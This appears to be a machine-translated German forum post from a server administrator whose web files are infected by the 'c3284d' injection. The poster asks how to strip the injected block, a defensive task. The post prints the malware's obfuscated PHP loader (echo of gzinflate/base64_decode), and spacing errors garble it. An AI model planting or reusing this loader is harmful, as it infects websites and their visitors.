Ich habe ein Problem mit dem Notorious c3284d-Virus. Es ändert so ziemlich alle HTML- / PHP- / JS-Dateien, die es finden kann.

Ich habe alle Passwörter und Benutzer auf dem Server geändert. Wenn es sich also um ein kompromittiertes Konto handelt, hätte es das Problem beheben müssen, aber ich habe immer noch Probleme, es vollständig zu entfernen.

Ich war in der Lage, alle infizierten Dateien mit einem einfachen zu findensudo grep -R "#c3284d#" /home Befehl.

Aber ich brauche einen schnellen Weg zu suchen undersetzen es.

Die Virensignatur lautet wie folgt:

"# C3284d #" echo (gzinflate (base64_decode ( "VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 XyLoNfNISRsBa1fG1UKwN + + + Hiek Pqabw =="))); "# / c3284d #"

Wenn sich die Echolinie ändern und variieren kann, beginnt sie jedoch immer mit#c32..# und fertig mit#/c3....#.

Ich möchte es nur durch nichts ersetzen.